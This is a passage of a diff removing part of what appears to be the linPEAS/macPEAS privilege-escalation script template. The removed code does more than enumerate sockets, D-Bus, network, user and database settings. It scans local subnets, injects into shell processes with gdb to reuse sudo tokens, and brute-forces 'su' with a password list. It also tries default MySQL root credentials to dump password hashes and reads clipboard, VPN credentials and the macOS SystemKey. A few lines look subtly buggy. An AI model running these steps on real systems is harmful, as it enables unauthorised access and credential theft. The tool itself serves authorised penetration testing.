2>/dev/null) - - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" - - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi - - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null - echo "" - - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" - echo "" - - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" - - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null - else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi - - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp - fi - - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null - echo "" - fi - done - fi - fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi - echo "" - - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" - fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," - fi - done - echo "" - - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" - fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done - fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - fi - echo "" - - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" - - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi - - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC - fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... " - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... " - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," - fi - done - else echo_not_found - fi - echo "" - - peass{MariaDB} - - peass{PostgreSQL} - - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - fi - - peass{Mongo} - - peass{Apache} - - peass{Tomcat} - - peass{FastCGI} - - peass{Http_conf} - - peass{Htpasswd} - - peass{PHP Sessions} - - peass{Wordpress} - - 